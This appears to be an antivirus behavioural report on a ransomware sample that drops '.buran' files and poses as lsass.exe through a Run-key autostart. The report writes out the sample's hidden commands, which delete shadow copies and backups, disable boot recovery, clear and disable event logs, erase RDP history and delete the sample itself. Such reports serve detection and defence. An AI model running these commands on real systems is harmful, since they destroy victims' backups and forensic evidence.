Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Local Security Authority Subsystem Service' = '"%APPDATA%\Microsoft\Windows\lsass.exe" -start'
Malicious functions
To complicate detection of its presence in the operating system,
deletes volume shadow copies.
Modifies file system
Creates the following files
- %TEMP%\5531c75f.buran
- %APPDATA%\microsoft\windows\lsass.exe
- %TEMP%\49196560.buran
Deletes the following files
- %TEMP%\5531c75f.buran
- %TEMP%\49196560.buran
Deletes itself.
Network activity
UDP
- DNS ASK ge###tool.com
- DNS ASK ip##gger.ru
Miscellaneous
Creates and executes the following
- '%APPDATA%\microsoft\windows\lsass.exe' -agent 5
- '%APPDATA%\microsoft\windows\lsass.exe' -start
- '%APPDATA%\microsoft\windows\lsass.exe' -agent 3
- '%APPDATA%\microsoft\windows\lsass.exe' -agent 2
- '%APPDATA%\microsoft\windows\lsass.exe' -agent 1
- '%APPDATA%\microsoft\windows\lsass.exe' -agent 0
- '%APPDATA%\microsoft\windows\lsass.exe' -agent 4
- '%WINDIR%\syswow64\cmd.exe' /C sc config eventlog start=disabled' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log System' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log Security' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log Application' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C del "%userprofile%\documents\Default.rdp"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin delete systemstatebackup -keepversions:0' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C wmic shadowcopy delete' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin delete backup' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin delete systemstatebackup' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin delete catalog -quiet' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} recoveryenabled no' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} bootstatuspolicy ignoreallfailures' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "<Full path to file>" & if not exist "<Full path to file>" exit )' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C attrib "%userprofile%\documents\Default.rdp" -s -h' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /e:on /c md "%APPDATA%\Microsoft\Windows" & copy "<Full path to file>" "%APPDATA%\Microsoft\Windows\lsass.exe" & reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security ...' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /e:on /c md "%APPDATA%\Microsoft\Windows" & copy "<Full path to file>" "%APPDATA%\Microsoft\Windows\lsass.exe" & reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security ...
- '%WINDIR%\syswow64\wevtutil.exe' clear-log System
- '%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log System
- '%WINDIR%\syswow64\wevtutil.exe' clear-log Security
- '%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log Security
- '%WINDIR%\syswow64\wevtutil.exe' clear-log Application
- '%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log Application
- '%WINDIR%\syswow64\cmd.exe' /C del "%userprofile%\documents\Default.rdp"
- '%WINDIR%\syswow64\attrib.exe' "%HOMEPATH%\documents\Default.rdp" -s -h
- '%WINDIR%\syswow64\cmd.exe' /C attrib "%userprofile%\documents\Default.rdp" -s -h
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
- '%WINDIR%\syswow64\cmd.exe' /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
- '%WINDIR%\syswow64\cmd.exe' /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
- '%WINDIR%\syswow64\cmd.exe' /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
- '%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet
- '<SYSTEM32>\vssvc.exe'
- '%WINDIR%\syswow64\cmd.exe' /C wmic shadowcopy delete
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin delete backup
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin delete systemstatebackup -keepversions:0
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin delete systemstatebackup
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin delete catalog -quiet
- '%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} recoveryenabled no
- '%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
- '%WINDIR%\syswow64\ping.exe' -n 3 127.1
- '%WINDIR%\syswow64\cmd.exe' /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "<Full path to file>" & if not exist "<Full path to file>" exit )
- '%WINDIR%\syswow64\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"%APPDATA%\Microsoft\Windows\lsass.exe\" -start"
- '%WINDIR%\syswow64\cmd.exe' /C sc config eventlog start=disabled
- '%WINDIR%\syswow64\sc.exe' config eventlog start=disabled
